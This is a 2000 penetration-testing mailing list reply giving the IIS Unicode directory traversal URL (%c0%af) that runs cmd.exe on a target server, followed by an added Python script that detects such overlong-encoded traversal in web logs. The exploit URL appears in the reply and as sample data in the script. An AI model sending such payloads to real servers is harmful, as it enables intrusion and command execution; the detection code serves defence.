Penetration Testing mailing list archives

Re: [PEN-TEST] Unicode Command Execution
From: Roberto Poblete <roberto () ORION CL>
Date: Wed, 15 Nov 2000 10:04:25 -0600

You may try this:

http://IP_TO_BE
HACKED/msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

where msadc can be any virtual directory with NTFS permission for everyone
and execute permission at the IIS, this means you can replace msadc with
cgi-bin, certserv, scripts, etc.

Good luck

Roberto

parth_galen () LYCOS COM writes:
The one problem I am having with this exploit is invoking cmd.exe when
the IIS web root is on a different drive.

If IIS is installed on D:, how do you launch cmd.exe (anything) when it
is on C: ?

I have been playing the msadc's approach, but not getting it to work...

Any ideas?





_________________________________
Regards,
Roberto Poblete / email: roberto () orion cl
phone: 6403943 / Fax: 6403990
Orion 2000
Professional Information Security Services
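
A defender's view of the request described in this message, as an added example that is not part of the original post: the script canonicalises overlong two-byte UTF-8 sequences such as `%c0%af` before checking a logged path for `..` segments, and it generalises beyond that one sequence to any `0xC0`/`0xC1` lead byte. The `client method target` log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong two-byte UTF-8: lead byte 0xC0/0xC1 plus a continuation byte
# encodes a code point below 0x80 that should have been a single byte.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")

def _collapse(match):
    lead, cont = match.group(0)
    return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])

def inspect_path(raw_path):
    """Return (flagged, reason, canonical_path) for a raw request path."""
    decoded = unquote_to_bytes(raw_path)
    canonical = OVERLONG.sub(_collapse, decoded)
    overlong = canonical != decoded
    # Treat both '/' and '\' as separators, as a Windows server would.
    traversal = b".." in re.split(rb"[/\\]", canonical)
    if overlong and traversal:
        reason = "overlong-encoded separator in traversal"
    elif overlong:
        reason = "overlong UTF-8 encoding"
    elif traversal:
        reason = "directory traversal"
    else:
        reason = ""
    return bool(reason), reason, canonical.decode("latin-1")

def scan(log_lines):
    """Yield (client, reason, canonical_path) for each flagged request."""
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        client, _method, target = fields[:3]
        path = target.split("?", 1)[0]
        flagged, reason, canonical = inspect_path(path)
        if flagged:
            yield client, reason, canonical

# Constructed sample lines in an assumed "client method target" layout.
SAMPLE = [
    "192.0.2.10 GET /default.asp",
    "192.0.2.44 GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\",
    "192.0.2.45 GET /scripts/report%c1%9c2000.asp",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

Canonicalising before the check matters here: a filter that looks for `../` in the raw or singly percent-decoded path never sees the separator in these requests.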

